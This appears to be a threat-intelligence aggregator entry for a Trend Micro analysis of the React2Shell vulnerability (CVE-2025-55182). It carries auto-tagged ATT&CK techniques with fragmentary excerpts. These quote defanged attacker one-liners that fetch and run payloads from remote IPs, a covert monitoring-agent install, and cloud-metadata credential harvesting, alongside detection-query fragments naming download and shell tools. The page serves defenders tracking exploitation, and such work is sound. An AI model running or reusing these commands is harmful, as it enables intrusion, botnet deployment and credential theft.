TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Trend Micro Research

CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation

Ashish Verma · 2025-12-10 · Read original ↗

ATT&CK techniques detected

16 predictions
T1552.005Cloud Instance Metadata API
89%
“uses discovered aws credentials to list and scan s3 buckets accessible to the host. - directories : / tmp, / var / www, / opt, / etc, and user home directories. cloud metadata harvesting the script aggressively targets cloud instance metadata services ( imds ) to steal temporary …”
T1574.006Dynamic Linker Hijacking
89%
“root access. to maintain control, it clears competing cron jobs and installs its own to re - download the payload every minute from 80. 64. 16 [. ] 241. it disables firewalls ( ufw / iptables ), removes file immutability flags, and attempts to preload a malicious shared library w…”
T1190Exploit Public-Facing Application
89%
“. ] cc as a c & c server. windows exploitation attempts during our threat hunting activities, we observed windows devices being targeted with exploitation attempts. in most cases, it looked like scanning activity, as the commands were aimed at unix / linux hosts and attempted to …”
T1543.002Systemd Service
83%
“] 205 / s | sh. this script downloads and executes a binary called " ntpclient " ( mimicking legitimate ntp client software ) from hxxp : / / 38. 165. 44 [. ] 205 / 1, along with a configuration file, runs it in the background with all output suppressed, and establishes persisten…”
T1059.001PowerShell
81%
“##lepath : " / more " or objectfilepath : " / less " or objectfilepath : " / base64 " or objectfilepath : " / perl " or objectfilepath : " / python " or objectfilepath : " / ruby " or objectfilepath : " / node " or objectfilepath : " / java " or objectfilepath : " / nohup " or ob…”
T1053.005Scheduled Task
78%
“powershell _ ise. exe " or processfilepath : " * \ pwsh. exe " or processfilepath : " * \ wscript. exe " or processfilepath : " * \ cscript. exe " or processfilepath : " * \ mshta. exe " or processfilepath : " * \ rundll32. exe " or processfilepath : " * \ regsvr32. exe " or proc…”
T1190Exploit Public-Facing Application
77%
“observed. enterprises can use the ioc table to update their respective threat feeds, and the timeline to assess if their organization was exposed during the exploitation window. according to trend micro telemetry, there was a notable surge in exploitation attempts between decembe…”
T1190Exploit Public-Facing Application
77%
“connection to the controller. once enrolled, the agent periodically reports host telemetry such as cpu, memory, disk, uptime, and network stats, along with healthcheck results. nezha itself is benign, but in this case, the covert installation, the use of a direct ip, disabled tls…”
T1055.001Dynamic-link Library Injection
64%
“\ curl. exe " or processfilepath : " * \ wget. exe " or processfilepath : " * \ ftp. exe " or processfilepath : " * \ tftp. exe " ) - nodejs spawning reconnaissance and network tools - windows eventsubid : 2 and parentfilepath : " * \ node. exe " and ( processfilepath : " * \ who…”
T1190Exploit Public-Facing Application
62%
“and automated mass - scanning. - trend™ research observed that cve - 2025 - 55182, as of this writing, is being exploited in - the - wild, and in several malware campaigns such as the emerald and nuts campaigns. several of these are attacks that execute cobalt strike beacons gene…”
T1588.006Vulnerabilities
53%
“observed. enterprises can use the ioc table to update their respective threat feeds, and the timeline to assess if their organization was exposed during the exploitation window. according to trend micro telemetry, there was a notable surge in exploitation attempts between decembe…”
T1059.004Unix Shell
53%
“] 150 / nuts / bolts - o - | sh ) ' alternative method : downloads mirai variant via shell script. curl - s hxxp : / / 193 [. ] 34 [. ] 213 [. ] 150 / nuts [. ] sh | bash this campaign deploys a mirai - based botnet variant using multiple download and execution techniques, levera…”
T1059.004Unix Shell
41%
“/ bin / sh - c curl - l https : / / raw. githubusercontent. com / nezhahq / scripts / main / agent / install. sh - o agent. sh & & chmod + x agent. sh & & env nz _ server = 107. 174. 123. 91 : 11451 nz _ tls = false nz _ client _ secret = [ redacted ]. / agent. sh this oneliner d…”
T1555.006Cloud Secrets Management Stores
41%
“uses discovered aws credentials to list and scan s3 buckets accessible to the host. - directories : / tmp, / var / www, / opt, / etc, and user home directories. cloud metadata harvesting the script aggressively targets cloud instance metadata services ( imds ) to steal temporary …”
T1059.004Unix Shell
39%
“] 205 / s | sh. this script downloads and executes a binary called " ntpclient " ( mimicking legitimate ntp client software ) from hxxp : / / 38. 165. 44 [. ] 205 / 1, along with a configuration file, runs it in the background with all output suppressed, and establishes persisten…”
T1190Exploit Public-Facing Application
36%
“backdoored tools establish persistence on your scanning infrastructure - attacker reconnaissance. your target list becomes their target list - time wasted. security teams spend cycles on non - functional tools while real exploitation continues verified legitimate proof - of - con…”

Summary

CVE-2025-55182 is a CVSS 10.0 pre-authentication RCE affecting React Server Components. Amid the flood of fake proof-of-concept exploits, scanners, exploits, and widespread misconceptions, this technical analysis intends to cut through the noise.